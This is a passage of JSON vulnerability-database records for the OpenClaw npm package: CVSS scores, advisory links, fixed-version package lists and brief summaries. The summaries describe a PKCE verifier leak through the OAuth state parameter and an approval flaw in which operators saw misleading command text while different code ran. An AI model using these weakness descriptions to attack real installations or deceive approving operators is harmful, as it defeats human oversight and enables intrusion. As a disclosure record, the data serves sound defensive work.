g_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62662"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7jp6-r74r-995q","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7jp6-r74r-995q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42433","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42433"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-matrix-profile-config-persistence-access-via-operator-write-message-tools","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-matrix-profile-config-persistence-access-via-operator-write-message-tools"},{"reference_url":"https://github.com/advisories/GHSA-7jp6-r74r-995q","reference_id":"GHSA-7jp6-r74r-995q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jp6-r74r-995q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-42433","GHSA-7jp6-r74r-995q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qedr-a3ay-v3gx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90848?format=json","vulnerability_id":"VCID-qhr2-jktm-uycx","summary":"Duplicate Advisory: OpenClaw: Node-host approvals could show misleading shell payloads instead of the executed argv\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rw39-5899-8mxp. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains an approval-integrity vulnerability in node-host system.run approvals that displays extracted shell payloads instead of the executed argv. Attackers can place wrapper binaries and induce wrapper-shaped commands to execute local code after operators approve misleading command text.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rw39-5899-8mxp","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rw39-5899-8mxp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32971","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32971"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-node-host-approval-ui-mismatch-allows-execution-of-unintended-commands","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-node-host-approval-ui-mismatch-allows-execution-of-unintended-commands"},{"reference_url":"https://github.com/advisories/GHSA-w8rf-7qf8-65ww","reference_id":"GHSA-w8rf-7qf8-65ww","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w8rf-7qf8-65ww"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-w8rf-7qf8-65ww"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qhr2-jktm-uycx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89434?format=json","vulnerability_id":"VCID-qjss-tvgk-3ubk","summary":"Duplicate Advisory: OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9jpj-g8vv-j5mf. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.4.2 reuses the PKCE verifier as the OAuth state parameter in the Gemini OAuth flow, exposing it through the redirect URL. Attackers who capture the redirect URL can obtain both the authorization code and PKCE verifier, defeating PKCE protection and enabling token redemption.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34511","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34511"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter"},{"reference_url":"https://github.com/advisories/GHSA-ch86-pxr9-j